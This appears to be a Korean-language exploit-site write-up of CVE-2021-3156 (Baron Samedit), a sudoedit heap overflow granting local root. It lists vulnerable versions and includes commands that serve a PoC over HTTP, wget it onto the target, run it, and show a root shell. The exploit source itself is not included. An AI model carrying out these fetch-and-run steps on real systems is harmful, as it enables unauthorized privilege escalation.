Sploitus

Exploit for Review.

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN96 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TOPSKIYPAVELQWERTYGANG-REVIEW.CVE-2021-3156
# πŸ‘‘ CVE-2021-3156 (Baron Samedit) β€” sudoμ—μ„œ νž™ μ˜€λ²„ν”Œλ‘œμš°λ₯Ό ν†΅ν•œ κΆŒν•œ μƒμŠΉ

πŸ“… **λ‚ μ§œ:** 2025-06-08  
✍️ **μž‘μ„±μž:** @TopskiyPavelQwertyGang 🧠 λ³΄μ•ˆ 연ꡬ원 | λ ˆλ“œνŒ€ μ• ν˜Έκ°€

* * *

## 🧠 CVE κ°œμš”

  * **CVE-ID:** CVE-2021-3156
  * **μœ ν˜•:** Heap-based Buffer Overflow
  * **κ΅¬μ„±μš”μ†Œ:** `sudoedit` (sudo)
  * **μ•‘μ„ΈμŠ€ 레벨:** Local
  * **λͺ©ν‘œ:** 루트 κΆŒν•œ νšλ“



* * *

## 🧠 μ„€λͺ…

`sudoedit`의 νž™ μ˜€λ²„ν”Œλ‘œμš°λ‘œ 인해 둜컬 μ‚¬μš©μžκ°€ 미리 μ€€λΉ„λœ λ§€κ°œλ³€μˆ˜λ‘œ `sudoedit` λͺ…령을 μ‹€ν–‰ν•  λ•Œ 루트 μ•‘μ„ΈμŠ€ κΆŒν•œμ„ 얻을 수 μžˆμŠ΅λ‹ˆλ‹€.

이 취약점은 `sudo` < 1.9.5p2 λ²„μ „μ—μ„œ ν™œμ„±ν™”λ˜λ©°, 인기 μžˆλŠ” Ubuntu/Debian/CentOS 이미지λ₯Ό ν¬ν•¨ν•©λ‹ˆλ‹€. ASLR이 ν™œμ„±ν™”λœ κ²½μš°μ—λ„ μ—¬μ „νžˆ μ•…μš© κ°€λŠ₯ν•©λ‹ˆλ‹€.

* * *

## 🐾 μ•…μš© 쑰건

root@kitploit:~
    
    
    OS     : Ubuntu 20.04.3 LTS
    glibc  : 2.31 (tcache ON)
    sudo   : 1.8.31 (μœ μ•½ν•¨)
    ASLR   : 2 (ν™œμ„±ν™”)
    

* * *

## πŸ§ͺ ν™˜κ²½ μ€€λΉ„

  1. `glibc` 및 `sudo` 버전 확인:



root@kitploit:~
    
    
    ldd --version
    sudo --version
    

  2. λ‚΄μž₯ HTTP μ„œλ²„λ₯Ό 톡해 λ‹€λ₯Έ λ¨Έμ‹ μ—μ„œ PoC 슀크립트 전솑:



root@kitploit:~
    
    
    python3 -m http.server 80
    

  3. λŒ€μƒ λ¨Έμ‹ μ—μ„œ PoC λ‹€μš΄λ‘œλ“œ 및 μ‹€ν–‰:



root@kitploit:~
    
    
    wget http://<IP>:80/exploit_nss.py
    python3 exploit_nss.py
    

* * *

## πŸš€ PoC 성곡적 μ•…μš©

root@kitploit:~
    
    
    $ python3 exploit_nss.py
    # whoami
    root
    

* * *

## 🧾 결둠

`CVE-2021-3156` μ•…μš©μ€ `glibc` β‰₯ 2.26이고 `sudo`κ°€ μ·¨μ•½ν•œ 버전인 경우 ASLR이 ν™œμ„±ν™”λœ μƒνƒœμ—μ„œλ„ κ°€λŠ₯ν•©λ‹ˆλ‹€. κ°€μž₯ μ•ˆμ •μ μΈ μ΅μŠ€ν”Œλ‘œμž‡μ€ μ˜¬λ°”λ₯Έ NSS κ΅¬μ„±μ—μ„œ 첫 번째 μ‹œλ„μ— μ„±κ³΅ν•˜λŠ” `exploit_nss.py`μž…λ‹ˆλ‹€.

🧨 **μ‹œμŠ€ν…œμ΄ μ œμ–΄λ˜μ—ˆμŠ΅λ‹ˆλ‹€.**

* * *